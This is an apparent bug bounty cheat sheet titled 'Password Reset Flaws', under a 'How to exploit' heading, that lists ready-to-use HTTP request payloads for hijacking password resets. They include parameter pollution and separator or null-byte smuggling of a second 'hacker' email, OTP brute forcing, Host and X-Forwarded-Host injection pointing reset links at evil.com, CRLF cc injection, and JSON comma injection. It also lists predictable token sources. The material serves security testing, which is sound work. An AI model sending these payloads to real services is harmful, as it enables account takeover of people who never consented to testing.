AllAboutBugBounty/Misc/Password Reset Flaws.md
2022-06-15 17:38:42 +07:00

1.6 KiB

Password Reset Flaws

Introduction

Common security flaws in password reset functionality

How to exploit

  1. Parameter pollution in reset password
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
  1. Bruteforce the OTP code
POST /reset
[...]
email=victim@mail.com&code=$123456$
  1. Host header Injection
POST /reset
Host: evil.com
[...]
email=victim@mail.com
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com

And the victim will receive the reset link with evil.com

  1. Using separator in value of the parameter
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
  1. No domain in value of the paramter
POST /reset
[...]
email=victim
  1. No TLD in value of the parameter
POST /reset
[...]
email=victim@mail
  1. Using carbon copy
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
  1. If there is JSON data in body requests, add comma
POST /newaccount
[...]
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
  1. Find out how the tokens generate
  • Generated based on TimeStamp
  • Generated based on the ID of the user
  • Generated based on the email of the user
  • Generated based on the name of the user

References